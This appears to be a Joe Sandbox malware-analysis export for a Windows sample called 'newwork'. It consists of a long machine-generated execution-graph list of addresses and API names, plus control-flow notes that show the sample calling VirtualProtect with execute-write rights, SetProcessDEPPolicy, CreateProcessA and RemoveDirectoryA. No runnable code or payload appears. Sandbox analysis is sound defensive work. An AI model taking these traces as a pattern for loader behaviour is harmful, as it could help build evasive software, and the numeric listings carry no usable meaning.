6475 4025ac 4 API calls 6474->6475 6476 4028f4 6475->6476 6834 4019d3 6835 4019ba 6834->6835 6836 4019c3 RtlLeaveCriticalSection 6835->6836 6837 4019cd 6835->6837 6836->6837 5397 407fd4 5398 407fe6 5397->5398 5400 407fed 5397->5400 5408 407f10 5398->5408 5402 408017 5400->5402 5404 408015 5400->5404 5407 408021 5400->5407 5401 40804e 5419 407d7c 5402->5419 5403 407d7c 33 API calls 5403->5401 5422 407e2c 5404->5422 5407->5401 5407->5403 5409 407f25 5408->5409 5410 407d7c 33 API calls 5409->5410 5411 407f34 5409->5411 5410->5411 5412 407f6e 5411->5412 5413 407d7c 33 API calls 5411->5413 5414 407f82 5412->5414 5415 407d7c 33 API calls 5412->5415 5413->5412 5418 407fae 5414->5418 5429 407eb8 5414->5429 5415->5414 5418->5400 5432 4058c4 5419->5432 5421 407d9e 5421->5407 5423 405194 33 API calls 5422->5423 5424 407e57 5423->5424 5440 407de4 5424->5440 5426 407e5f 5427 403198 4 API calls 5426->5427 5428 407e74 5427->5428 5428->5407 5430 407ec7 VirtualFree 5429->5430 5431 407ed9 VirtualAlloc 5429->5431 5430->5431 5431->5418 5434 4058d0 5432->5434 5433 405194 33 API calls 5435 4058fd 5433->5435 5434->5433 5436 4031e8 18 API calls 5435->5436 5437 405908 5436->5437 5438 403198 4 API calls 5437->5438 5439 40591d 5438->5439 5439->5421 5441 4058c4 33 API calls 5440->5441 5442 407e06 5441->5442 5442->5426 6477 405ad4 6478 405adc 6477->6478 6480 405ae4 6477->6480 6479 405aeb 6478->6479 6481 405ae2 6478->6481 6482 405940 19 API calls 6479->6482 6484 405a4c 6481->6484 6482->6480 6485 405a54 6484->6485 6486 405a6e 6485->6486 6487 403154 4 API calls 6485->6487 6488 405a73 6486->6488 6489 405a8a 6486->6489 6487->6485 6491 405940 19 API calls 6488->6491 6490 403154 4 API calls 6489->6490 6493 405a8f 6490->6493 6492 405a86 6491->6492 6495 403154 4 API calls 6492->6495 6494 4059b0 33 API calls 6493->6494 6494->6492 6496 405ab8 6495->6496 6497 403154 4 API calls 6496->6497 6498 405ac6 6497->6498 6498->6480 5910 40a9de 5911 40aa03 5910->5911 5912 407918 InterlockedExchange 5911->5912 5913 
40aa2d 5912->5913 5914 409ae8 18 API calls 5913->5914 5915 40aa3d 5913->5915 5914->5915 5920 4076ac SetEndOfFile 5915->5920 5917 40aa59 5918 4025ac 4 API calls 5917->5918 5919 40aa90 5918->5919 5921 4076c3 5920->5921 5922 4076bc 5920->5922 5921->5917 5923 40748c 35 API calls 5922->5923 5923->5921 6841 402be9 RaiseException 6842 402c04 6841->6842 6509 402af2 6510 402afe 6509->6510 6513 402ed0 6510->6513 6514 403154 4 API calls 6513->6514 6516 402ee0 6514->6516 6515 402b03 6516->6515 6518 402b0c 6516->6518 6519 402b25 6518->6519 6520 402b15 RaiseException 6518->6520 6519->6515 6520->6519 5448 40a5f8 5491 4030dc 5448->5491 5450 40a60e 5494 4042e8 5450->5494 5452 40a613 5497 40457c GetModuleHandleA GetProcAddress 5452->5497 5456 40a61d 5505 4065c8 5456->5505 5458 40a622 5514 4090a4 GetModuleHandleA GetProcAddress GetModuleHandleA GetProcAddress 5458->5514 5468 40a665 5536 406c2c 5468->5536 5469 4031e8 18 API calls 5470 40a683 5469->5470 5550 4074e0 5470->5550 5476 407918 InterlockedExchange 5479 40a6d2 5476->5479 5477 40a710 5570 4074a0 5477->5570 5479->5477 5607 409ae8 5479->5607 5480 40a751 5574 407a28 5480->5574 5481 40a736 5481->5480 5482 409ae8 18 API calls 5481->5482 5482->5480 5484 40a776 5584 408b08 5484->5584 5488 40a7bc 5489 408b08 35 API calls 5488->5489 5490 40a7f5 5488->5490 5489->5488 5617 403094 5491->5617 5493 4030e1 GetModuleHandleA GetCommandLineA 5493->5450 5495 403154 4 API calls 5494->5495 5496 404323 5494->5496 5495->5496 5496->5452 5498 404598 5497->5498 5499 40459f GetProcAddress 5497->5499 5498->5499 5500 4045b5 GetProcAddress 5499->5500 5501 4045ae 5499->5501 5502 4045c4 SetProcessDEPPolicy 5500->5502 5503 4045c8 5500->5503 5501->5500 5502->5503 5504 404624 6FCB1CD0 5503->5504 5504->5456 5618 405ca8 5505->5618 5515 4090f7 5514->5515 5702 406fa0 SetErrorMode 5515->5702 5518 407284 19 API calls 5519 409127 5518->5519 5520 403198 4 API calls 5519->5520 5521 40913c 5520->5521 5522 409b78 GetSystemInfo VirtualQuery 5521->5522 5523 409c2c 5522->5523 
5526 409ba2 5522->5526 5528 409768 5523->5528 5524 409c0d VirtualQuery 5524->5523 5524->5526 5525 409bcc VirtualProtect 5525->5526 5526->5523 5526->5524 5526->5525 5527 409bfb VirtualProtect 5526->5527 5527->5524 5708 406bd0 GetCommandLineA 5528->5708 5530 409785 5531 409850 5530->5531 5532 406c2c 20 API calls 5530->5532 5535 403454 18 API calls 5530->5535 5533 4031b8 4 API calls 5531->5533 5532->5530 5534 40986a 5533->5534 5534->5468 5600 409c88 5534->5600 5535->5530 5537 406c53 GetModuleFileNameA 5536->5537 5538 406c77 GetCommandLineA 5536->5538 5539 403278 18 API calls 5537->5539 5546 406c7c 5538->5546 5540 406c75 5539->5540 5544 406ca4 5540->5544 5541 406c81 5542 403198 4 API calls 5541->5542 5545 406c89 5542->5545 5543 406af0 18 API calls 5543->5546 5547 403198 4 API calls 5544->5547 5548 40322c 4 API calls 5545->5548 5546->5541 5546->5543 5546->5545 5549 406cb9 5547->5549 5548->5544 5549->5469 5551 4074ea 5550->5551 5715 407576 5551->5715 5718 407578 5551->5718 5552 407516 5553 40752a 5552->5553 5554 40748c 35 API calls 5552->5554 5557 409c34 FindResourceA 5553->5557 5554->5553 5558 409c49 5557->5558 5559 409c4e SizeofResource 5557->5559 5560 409ae8 18 API calls 5558->5560 5561 409c60 LoadResource 5559->5561 5562 409c5b 5559->5562 5560->5559 5564 409c73 LockResource 5561->5564 5565 409c6e 5561->5565 5563 409ae8 18 API calls 5562->5563 5563->5561 5567 409c84 5564->5567 5568 409c7f 5564->5568 5566 409ae8 18 API calls 5565->5566 5566->5564 5567->5476 5567->5479 5569 409ae8 18 API calls 5568->5569 5569->5567 5571 4074b4 5570->5571 5572 4074c4 5571->5572 5573 4073ec 34 API calls 5571->5573 5572->5481 5573->5572 5575 407a35 5574->5575 5576 405890 18 API calls 5575->5576 5577 407a89 5575->5577 5576->5577 5578 407918 InterlockedExchange 5577->5578 5579 407a9b 5578->5579 5580 405890 18 API calls 5579->5580 5581 407ab1 5579->5581 5580->5581 5582 405890 18 API calls 5581->5582 5583 407af4 5581->5583 5582->5583 5583->5484 5596 408b39 5584->5596 5598 408b82 5584->5598 
5585 408bcd 5721 407cb8 5585->5721 5586 407cb8 35 API calls 5586->5596 5588 408be4 5591 4031b8 4 API calls 5588->5591 5589 4034f0 18 API calls 5589->5596 5590 4034f0 18 API calls 5590->5598 5593 408bfe 5591->5593 5592 4031e8 18 API calls 5592->5596 5614 404c20 5593->5614 5594 403420 18 API calls 5594->5596 5595 4031e8 18 API calls 5595->5598 5596->5586 5596->5589 5596->5592 5596->5594 5596->5598 5597 403420 18 API calls 5597->5598 5598->5585 5598->5590 5598->5595 5598->5597 5599 407cb8 35 API calls 5598->5599 5599->5598 5601 40322c 4 API calls 5600->5601 5602 409cab 5601->5602 5603 409cba MessageBoxA 5602->5603 5604 409ccf 5603->5604 5605 403198 4 API calls 5604->5605 5606 409cd7 5605->5606 5606->5468 5608 409af1 5607->5608 5609 409b09 5607->5609 5610 405890 18 API calls 5608->5610 5611 405890 18 API calls 5609->5611 5612 409b03 5610->5612 5613 409b1a 5611->5613 5612->5477 5613->5477 5743 402594 5614->5743 5616 404c2b 5616->5488 5617->5493 5619 405940 19 API calls 5618->5619 5620 405cb9 5619->5620 5621 405280 GetSystemDefaultLCID 5620->5621 5624 4052b6 5621->5624 5622 4031e8 18 API calls 5622->5624 5623 404cdc 19 API calls 5623->5624 5624->5622 5624->5623 5625 40520c 19 API calls 5624->5625 5626 405318 5624->5626 5625->5624 5627 404cdc 19 API calls 5626->5627 5628 40520c 19 API calls 5626->5628 5629 4031e8 18 API calls 5626->5629 5630 40539b 5626->5630 5627->5626 5628->5626 5629->5626 5631 4031b8 4 API calls 5630->5631 5632 4053b5 5631->5632 5633 4053c4 GetSystemDefaultLCID 5632->5633 5690 40520c GetLocaleInfoA 5633->5690 5636 4031e8 18 API calls 5637 405404 5636->5637 5638 40520c 19 API calls 5637->5638 5639 405419 5638->5639 5640 40520c 19 API calls 5639->5640 5641 40543d 5640->5641 5696 405258 GetLocaleInfoA 5641->5696 5644 405258 GetLocaleInfoA 5645 40546d 5644->5645 5646 40520c 19 API calls 5645->5646 5647 405487 5646->5647 5648 405258 GetLocaleInfoA 5647->5648 5649 4054a4 5648->5649 5650 40520c 19 API calls 5649->5650 5651 4054be 5650->5651 5652 4031e8 18 API 
calls 5651->5652 5653 4054cb 5652->5653 5654 40520c 19 API calls 5653->5654 5655 4054e0 5654->5655 5656 4031e8 18 API calls 5655->5656 5657 4054ed 5656->5657 5658 405258 GetLocaleInfoA 5657->5658 5659 4054fb 5658->5659 5660 40520c 19 API calls 5659->5660 5661 405515 5660->5661 5662 4031e8 18 API calls 5661->5662 5663 405522 5662->5663 5664 40520c 19 API calls 5663->5664 5665 405537 5664->5665 5666 4031e8 18 API calls 5665->5666 5667 405544 5666->5667 5668 40520c 19 API calls 5667->5668 5669 405559 5668->5669 5670 405576 5669->5670 5671 405567 5669->5671 5673 40322c 4 API calls 5670->5673 5698 40322c 5671->5698 5674 405574 5673->5674 5675 40520c 19 API calls 5674->5675 5676 405598 5675->5676 5677 4055b5 5676->5677 5678 4055a6 5676->5678 5679 403198 4 API calls 5677->5679 5680 40322c 4 API calls 5678->5680 5681 4055b3 5679->5681 5680->5681 5682 4033b4 18 API calls 5681->5682 5683 4055d7 5682->5683 5684 4033b4 18 API calls 5683->5684 5685 4055f1 5684->5685 5686 4031b8 4 API calls 5685->5686 5687 40560b 5686->5687 5688 405cf4 GetVersionExA 5687->5688 5689 405d0b 5688->5689 5689->5458 5691 405233 5690->5691 5692 405245 5690->5692 5693 403278 18 API calls 5691->5693 5694 40322c 4 API calls 5692->5694 5695 405243 5693->5695 5694->5695 5695->5636 5697 405274 5696->5697 5697->5644 5700 403230 5698->5700 5699 403252 5699->5674 5700->5699 5701 4025ac 4 API calls 5700->5701 5701->5699 5706 403414 5702->5706 5705 406fee 5705->5518 5707 403418 LoadLibraryA 5706->5707 5707->5705 5709 406af0 18 API calls 5708->5709 5710 406bf3 5709->5710 5711 406c05 5710->5711 5712 406af0 18 API calls 5710->5712 5713 403198 4 API calls 5711->5713 5712->5710 5714 406c1a 5713->5714 5714->5530 5716 407578 5715->5716 5717 4075b7 CreateFileA 5716->5717 5717->5552 5719 403414 5718->5719 5720 4075b7 CreateFileA 5719->5720 5720->5552 5722 407cd3 5721->5722 5724 407cc8 5721->5724 5727 407c5c 5722->5727 5724->5588 5726 405890 18 API calls 5726->5724 5728 407c70 5727->5728 5729 407caf 5727->5729 5728->5729 
5731 407bac 5728->5731 5729->5724 5729->5726 5732 407bb7 5731->5732 5736 407bc8 5731->5736 5734 405890 18 API calls 5732->5734 5733 4074a0 34 API calls 5735 407bdc 5733->5735 5734->5736 5737 4074a0 34 API calls 5735->5737 5736->5733 5738 407bfd 5737->5738 5739 407918 InterlockedExchange 5738->5739 5740 407c12 5739->5740 5741 407c28 5740->5741 5742 405890 18 API calls 5740->5742 5741->5728 5742->5741 5744 402598 5743->5744 5746 4025a2 5743->5746 5749 401fd4 5744->5749 5745 40259e 5745->5746 5747 403154 4 API calls 5745->5747 5746->5616 5746->5746 5747->5746 5750 401fe8 5749->5750 5751 401fed 5749->5751 5760 401918 RtlInitializeCriticalSection 5750->5760 5753 402012 RtlEnterCriticalSection 5751->5753 5754 40201c 5751->5754 5759 401ff1 5751->5759 5753->5754 5754->5759 5767 401ee0 5754->5767 5757 402147 5757->5745 5758 40213d RtlLeaveCriticalSection 5758->5757 5759->5745 5761 40193c RtlEnterCriticalSection 5760->5761 5762 401946 5760->5762 5761->5762 5763 401964 LocalAlloc 5762->5763 5764 40197e 5763->5764 5765 4019c3 RtlLeaveCriticalSection 5764->5765 5766 4019cd 5764->5766 5765->5766 5766->5751 5770 401ef0 5767->5770 5768 401f1c 5772 401f40 5768->5772 5778 401d00 5768->5778 5770->5768 5770->5772 5773 401e58 5770->5773 5772->5757 5772->5758 5782 4016d8 5773->5782 5776 401e75 5776->5770 5779 401d4e 5778->5779 5780 401d1e 5778->5780 5779->5780 5851 401c68 5779->5851 5780->5772 5785 4016f4 5782->5785 5784 4016fe 5807 4015c4 5784->5807 5785->5784 5787 40175b 5785->5787 5789 40174f 5785->5789 5799 401430 5785->5799 5811 40132c 5785->5811 5787->5776 5792 401dcc 5787->5792 5815 40150c 5789->5815 5790 40170a 5790->5787 5825 401d80 5792->5825 5795 40132c LocalAlloc 5796 401df0 5795->5796 5798 401df8 5796->5798 5829 401b44 5796->5829 5798->5776 5800 40143f VirtualAlloc 5799->5800 5802 40146c 5800->5802 5803 40148f 5800->5803 5819 4012e4 5802->5819 5803->5785 5806 40147c VirtualFree 5806->5803 5809 40160a 5807->5809 5808 40163a 5808->5790 5809->5808 5810 401626 VirtualAlloc 
5809->5810 5810->5808 5810->5809 5812 401348 5811->5812 5813 4012e4 LocalAlloc 5812->5813 5814 40138f 5813->5814 5814->5785 5818 40153b 5815->5818 5816 401594 5816->5787 5817 401568 VirtualFree 5817->5818 5818->5816 5818->5817 5822 40128c 5819->5822 5823 401298 LocalAlloc 5822->5823 5824 4012aa 5822->5824 5823->5824 5824->5803 5824->5806 5826 401d89 5825->5826 5828 401d92 5825->5828 5826->5828 5834 401b74 5826->5834 5828->5795 5830 401b61 5829->5830 5831 401b52 5829->5831 5830->5798 5832 401d00 9 API calls 5831->5832 5833 401b5f 5832->5833 5833->5798 5837 40215c 5834->5837 5836 401b95 5836->5828 5838 40217a 5837->5838 5839 402175 5837->5839 5841 4021ab RtlEnterCriticalSection 5838->5841 5842 40217e 5838->5842 5849 4021b5 5838->5849 5840 401918 4 API calls 5839->5840 5840->5838 5841->5849 5842->5836 5843 4021c1 5845 4022e3 RtlLeaveCriticalSection 5843->5845 5846 4022ed 5843->5846 5844 402244 5844->5842 5847 401d80 7 API calls 5844->5847 5845->5846 5846->5836 5847->5842 5848 402270 5848->5843 5850 401d00 7 API calls 5848->5850 5849->5843 5849->5844 5849->5848 5850->5843 5852 401c7a 5851->5852 5853 401c9d 5852->5853 5854 401caf 5852->5854 5864 40188c 5853->5864 5856 40188c 3 API calls 5854->5856 5857 401cad 5856->5857 5858 401b44 9 API calls 5857->5858 5863 401cc5 5857->5863 5859 401cd4 5858->5859 5860 401cee 5859->5860 5874 401b98 5859->5874 5879 4013a0 5860->5879 5863->5780 5865 4018b2 5864->5865 5873 40190b 5864->5873 5883 401658 5865->5883 5868 40132c LocalAlloc 5869 4018cf 5868->5869 5870 40150c VirtualFree 5869->5870 5871 4018e6 5869->5871 5870->5871 5872 4013a0 LocalAlloc 5871->5872 5871->5873 5872->5873 5873->5857 5875 401bab 5874->5875 5876 401b9d 5874->5876 5875->5860 5877 401b74 9 API calls 5876->5877 5878 401baa 5877->5878 5878->5860 5881 4013ab 5879->5881 5880 4013c6 5880->5863 5881->5880 5882 4012e4 LocalAlloc 5881->5882 5882->5880 5885 40168f 5883->5885 5884 4016cf 5884->5868 5885->5884 5886 4016a9 VirtualFree 5885->5886 5886->5885 6843 402dfa 6844 
402e26 6843->6844 6845 402e0d 6843->6845 6847 402ba4 6845->6847 6848 402bc9 6847->6848 6849 402bad 6847->6849 6848->6844 6850 402bb5 RaiseException 6849->6850 6850->6848 6851 4075fa GetFileSize 6852 407626 6851->6852 6853 407616 GetLastError 6851->6853 6853->6852 6854 40761f 6853->6854 6855 40748c 35 API calls 6854->6855 6855->6852 6856 406ffb 6857 407008 SetErrorMode 6856->6857 6525 403a80 CloseHandle 6526 403a90 6525->6526 6527 403a91 GetLastError 6525->6527 6528 404283 6529 4042c3 6528->6529 6530 403154 4 API calls 6529->6530 6531 404323 6530->6531 6858 404185 6859 4041ff 6858->6859 6860 4041cc 6859->6860 6861 403154 4 API calls 6859->6861 6862 404323 6861->6862 6532 403e87 6533 403e4c 6532->6533 6534 403e62 6533->6534 6535 403e7b 6533->6535 6538 403e67 6533->6538 6541 403cc8 6534->6541 6537 402674 4 API calls 6535->6537 6539 403e78 6537->6539 6538->6539 6545 402674 6538->6545 6542 403cd6 6541->6542 6543 402674 4 API calls 6542->6543 6544 403ceb 6542->6544 6543->6544 6544->6538 6546 403154 4 API calls 6545->6546 6547 40267a 6546->6547 6547->6539 6556 407e90 6557 407eb8 VirtualFree 6556->6557 6558 407e9d 6557->6558 6561 403e95 6562 403e4c 6561->6562 6563 403e67 6562->6563 6564 403e62 6562->6564 6565 403e7b 6562->6565 6568 403e78 6563->6568 6569 402674 4 API calls 6563->6569 6566 403cc8 4 API calls 6564->6566 6567 402674 4 API calls 6565->6567 6566->6563 6567->6568 6569->6568 6570 40ac97 6579 4096fc 6570->6579 6573 402f24 5 API calls 6574 40aca1 6573->6574 6575 403198 4 API calls 6574->6575 6576 40acc0 6575->6576 6577 403198 4 API calls 6576->6577 6578 40acc8 6577->6578 6588 4056ac 6579->6588 6581 409717 6582 409745 6581->6582 6594 40720c 6581->6594 6585 403198 4 API calls 6582->6585 6584 409735 6587 40973d MessageBoxA 6584->6587 6586 40975a 6585->6586 6586->6573 6586->6574 6587->6582 6589 403154 4 API calls 6588->6589 6590 4056b1 6589->6590 6591 4056c9 6590->6591 6592 403154 4 API calls 6590->6592 6591->6581 6593 4056bf 6592->6593 6593->6581 6595 4056ac 4 API 
calls 6594->6595 6596 40721b 6595->6596 6597 407221 6596->6597 6598 40722f 6596->6598 6599 40322c 4 API calls 6597->6599 6600 40724b 6598->6600 6601 40723f 6598->6601 6603 40722d 6599->6603 6612 4032b8 6600->6612 6605 4071d0 6601->6605 6603->6584 6606 40322c 4 API calls 6605->6606 6607 4071df 6606->6607 6608 4071fc 6607->6608 6609 406950 CharPrevA 6607->6609 6608->6603 6610 4071eb 6609->6610 6610->6608 6611 4032fc 18 API calls 6610->6611 6611->6608 6613 403278 18 API calls 6612->6613 6614 4032c2 6613->6614 6614->6603 6615 403a97 6616 403aac 6615->6616 6617 403bbc GetStdHandle 6616->6617 6618 403b0e CreateFileA 6616->6618 6626 403ab2 6616->6626 6619 403c17 GetLastError 6617->6619 6632 403bba 6617->6632 6618->6619 6620 403b2c 6618->6620 6619->6626 6622 403b3b GetFileSize 6620->6622 6620->6632 6622->6619 6623 403b4e SetFilePointer 6622->6623 6623->6619 6628 403b6a ReadFile 6623->6628 6624 403be7 GetFileType 6625 403c02 CloseHandle 6624->6625 6624->6626 6625->6626 6628->6619 6629 403b8c 6628->6629 6630 403b9f SetFilePointer 6629->6630 6629->6632 6630->6619 6631 403bb0 SetEndOfFile 6630->6631 6631->6619 6631->6632 6632->6624 6632->6626 6637 40aaa2 6638 40aad2 6637->6638 6639 40aadc CreateWindowExA SetWindowLongA 6638->6639 6640 405194 33 API calls 6639->6640 6641 40ab5f 6640->6641 6642 4032fc 18 API calls 6641->6642 6643 40ab6d 6642->6643 6644 4032fc 18 API calls 6643->6644 6645 40ab7a 6644->6645 6646 406b7c 19 API calls 6645->6646 6647 40ab86 6646->6647 6648 4032fc 18 API calls 6647->6648 6649 40ab8f 6648->6649 6650 4099ec 43 API calls 6649->6650 6651 40aba1 6650->6651 6652 4098cc 19 API calls 6651->6652 6653 40abb4 6651->6653 6652->6653 6654 40abed 6653->6654 6655 4094d8 9 API calls 6653->6655 6656 40ac06 6654->6656 6659 40ac00 RemoveDirectoryA 6654->6659 6655->6654 6657 40ac1a 6656->6657 6658 40ac0f DestroyWindow 6656->6658 6660 40ac42 6657->6660 6661 40357c 4 API calls 6657->6661 6658->6657 6659->6656 6662 40ac38 6661->6662 6663 4025ac 4 API calls 6662->6663 
6663->6660 6875 405ba2 6877 405ba4 6875->6877 6876 405be0 6880 405940 19 API calls 6876->6880 6877->6876 6878 405bf7 6877->6878 6879 405bda 6877->6879 6884 404cdc 19 API calls 6878->6884 6879->6876 6881 405c4c 6879->6881 6882 405bf3 6880->6882 6883 4059b0 33 API calls 6881->6883 6885 403198 4 API calls 6882->6885 6883->6882 6886 405c20 6884->6886 6887 405c86 6885->6887 6888 4059b0 33 API calls 6886->6888 6888->6882 6889 408da4 6890 408dc8 6889->6890 6891 408c80 18 API calls 6890->6891 6892 408dd1 6891->6892 6664 402caa 6665 403154 4 API calls 6664->6665 6666 402caf 6665->6666 6907 4011aa 6908 4011ac GetStdHandle 6907->6908 6667 4028ac 6668 402594 18 API calls 6667->6668 6669 4028b6 6668->6669 4979 40aab4 4980 40aab8 SetLastError 4979->4980 5011 409648 GetLastError 4980->5011 4983 40aad2 4985 40aadc CreateWindowExA SetWindowLongA 4983->4985 5024 405194 4985->5024 4989 40ab6d 4990 4032fc 18 API calls 4989->4990 4991 40ab7a 4990->4991 5041 406b7c GetCommandLineA 4991->5041 4994 4032fc 18 API calls 4995 40ab8f 4994->4995 5046 4099ec 4995->5046 4997 40aba1 4999 40abb4 4997->4999 5067 4098cc 4997->5067 5000 40abd4 4999->5000 5001 40abed 4999->5001 5073 4094d8 5000->5073 5003 40ac06 5001->5003 5006 40ac00 RemoveDirectoryA 5001->5006 5004 40ac1a 5003->5004 5005 40ac0f DestroyWindow 5003->5005 5007 40ac42 5004->5007 5081 40357c 5004->5081 5005->5004 5006->5003 5009 40ac38 5094 4025ac 5009->5094 5098 404c94 5011->5098 5019 4096c3 5113 4031b8 5019->5113 5025 4051a8 33 API calls 5024->5025 5026 4051a3 5025->5026 5027 4032fc 5026->5027 5028 403300 5027->5028 5029 40333f 5027->5029 5030 4031e8 5028->5030 5031 40330a 5028->5031 5029->4989 5037 403254 18 API calls 5030->5037 5038 4031fc 5030->5038 5032 403334 5031->5032 5033 40331d 5031->5033 5034 4034f0 18 API calls 5032->5034 5274 4034f0 5033->5274 5040 403322 5034->5040 5035 403228 5035->4989 5037->5038 5038->5035 5039 4025ac 4 API calls 5038->5039 5039->5035 5040->4989 5300 406af0 5041->5300 5043 406ba1 5044 403198 4 API calls 
5043->5044 5045 406bbf 5044->5045 5045->4994 5314 4033b4 5046->5314 5048 409a27 5049 409a59 CreateProcessA 5048->5049 5050 409a65 5049->5050 5051 409a6c CloseHandle 5049->5051 5052 409648 35 API calls 5050->5052 5053 409a75 5051->5053 5052->5051 5054 4099c0 TranslateMessage DispatchMessageA PeekMessageA 5053->5054 5055 409a7a MsgWaitForMultipleObjects 5054->5055 5055->5053 5056 409a91 5055->5056 5057 4099c0 TranslateMessage DispatchMessageA PeekMessageA 5056->5057 5058 409a96 GetExitCodeProcess CloseHandle 5057->5058 5059 409ab6 5058->5059 5060 403198 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 5059->5060 5061 409abe 5060->5061 5061->4997 5062 402f24 5063 403154 4 API calls 5062->5063 5064 402f29 5063->5064 5320 402bcc 5064->5320 5066 402f51 5066->5066 5068 40990e 5067->5068 5069 4098d4 5067->5069 5068->4999 5069->5068 5070 403420 18 API calls 5069->5070 5071 409908 5070->5071 5323 408e80 5071->5323 5074 409532 5073->5074 5078 4094eb 5073->5078 5074->5001 5075 4094f3 Sleep 5075->5078 5076 409503 Sleep 5076->5078 5078->5074 5078->5075 5078->5076 5079 40951a GetLastError 5078->5079 5346 408fbc 5078->5346 5079->5074 5080 409524 GetLastError 5079->5080 5080->5074 5080->5078 5084 403591 5081->5084 5090 4035a0 5081->5090 5082 4035b1 5085 403198 4 API calls 5082->5085 5083 4035b8 5086 4031b8 4 API calls 5083->5086 5087 4035d0 5084->5087 5088 40359b 5084->5088 5089 4035b6 5084->5089 5085->5089 5086->5089 5087->5089 5092 40357c 4 API calls 5087->5092 5088->5090 5091 4035ec 5088->5091 5089->5009 5090->5082 5090->5083 5091->5089 5363 403554 5091->5363 5092->5087 5095 4025b0 5094->5095 5096 4025ba 5094->5096 5095->5096 5097 403154 4 API calls 5095->5097 5096->5007 5096->5096 5097->5096 5121 4051a8 5098->5121 5101 407284 FormatMessageA 5102 4072aa 5101->5102 5103 403278 18 API calls 5102->5103 5104 4072c7 5103->5104 5105 408da8 5104->5105 5106 408dc8 5105->5106 5264 408c80 5106->5264 5109 405890 5110 405897 5109->5110 5111 4031e8 18 API calls 5110->5111 5112 4058af 
                                                                                (Execution-graph edge list not reproduced: the node identifiers pair sub-function addresses in the 00401000-00409000 range with the imports they reach. The imports named along these edges are LoadStringA, VariantClear, VariantCopyInd, VariantChangeTypeEx, SysStringLen, SysAllocStringLen, MultiByteToWideChar, TlsGetValue, TlsSetValue, LocalAlloc, RaiseException, InterlockedExchange, DeleteFileA, GetLastError, SetLastError, Wow64DisableWow64FsRedirection, Wow64RevertWow64FsRedirection, RtlLeaveCriticalSection and RtlDeleteCriticalSection.)

                                                                                Control-flow Graph

                                                                                (Graph rendering not reproduced: the function at 00409B78 calls GetSystemInfo and VirtualQuery on the image base 00400000, walks the regions with repeated VirtualQuery calls at 409c0d, calls VirtualProtect at 409bcc on selected regions with a call into 00409B70 in between, and calls VirtualProtect again at 409bfb before resuming the walk. The executed/not-executed colouring of the blocks is lost.)
                                                                                APIs
                                                                                • GetSystemInfo.KERNEL32(?), ref: 00409B8A
                                                                                • VirtualQuery.KERNEL32(00400000,?,0000001C,?), ref: 00409B95
                                                                                • VirtualProtect.KERNEL32(?,?,00000040,?,00400000,?,0000001C,?), ref: 00409BD6
                                                                                • VirtualProtect.KERNEL32(?,?,?,?,?,?,00000040,?,00400000,?,0000001C,?), ref: 00409C08
                                                                                • VirtualQuery.KERNEL32(?,?,0000001C,00400000,?,0000001C,?), ref: 00409C18
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2567426632.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.2567386416.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.2567835108.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.2567893233.0000000000411000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_newwork.jbxd
                                                                                Similarity
                                                                                • API ID: Virtual$ProtectQuery$InfoSystem
                                                                                • String ID:
                                                                                • API String ID: 2441996862-0
                                                                                • Opcode ID: 69cc1b0b9b744b29044eea84e4744ba7a66f7205e02ae19cc0529fdcfa929845
                                                                                • Instruction ID: 4a1d84bb43d4a47cf168f169447d483ed62c711ee8ccb48f5bfbfd053dbeaed9
                                                                                • Opcode Fuzzy Hash: 69cc1b0b9b744b29044eea84e4744ba7a66f7205e02ae19cc0529fdcfa929845
                                                                                • Instruction Fuzzy Hash: D421A1B16043006BDA309AA99C85E57B7E8AF45360F144C2BFA99E72C3D239FC40C669
                                                                                APIs
                                                                                • GetLocaleInfoA.KERNEL32(?,00000044,?,00000100,0040C4BC,00000001,?,004052D7,?,00000000,004053B6), ref: 0040522A
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2567426632.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.2567386416.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.2567835108.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.2567893233.0000000000411000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_newwork.jbxd
                                                                                Similarity
                                                                                • API ID: InfoLocale
                                                                                • String ID:
                                                                                • API String ID: 2299586839-0
                                                                                • Opcode ID: 08facca5f8c818d7ae0117448837c5e97f15c9e55cb3aedc2694e0bc5091a832
                                                                                • Instruction ID: 1248db9972fbf410c55bf070b604c98f5d62b90992f8f49b6b6440a9954d2c50
                                                                                • Opcode Fuzzy Hash: 08facca5f8c818d7ae0117448837c5e97f15c9e55cb3aedc2694e0bc5091a832
                                                                                • Instruction Fuzzy Hash: E2E0927170021427D710A9A99C86AEB725CEB58310F0002BFB904E73C6EDB49E804AED

                                                                                Control-flow Graph

                                                                                APIs
                                                                                • GetModuleHandleA.KERNEL32(kernel32.dll,?,0040A618), ref: 00404582
                                                                                • GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 0040458F
                                                                                • GetProcAddress.KERNEL32(00000000,SetSearchPathMode), ref: 004045A5
                                                                                • GetProcAddress.KERNEL32(00000000,SetProcessDEPPolicy), ref: 004045BB
                                                                                • SetProcessDEPPolicy.KERNEL32(00000001,00000000,SetProcessDEPPolicy,00000000,SetSearchPathMode,kernel32.dll,?,0040A618), ref: 004045C6
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2567426632.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.2567386416.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.2567835108.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.2567893233.0000000000411000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_newwork.jbxd
                                                                                Similarity
                                                                                • API ID: AddressProc$HandleModulePolicyProcess
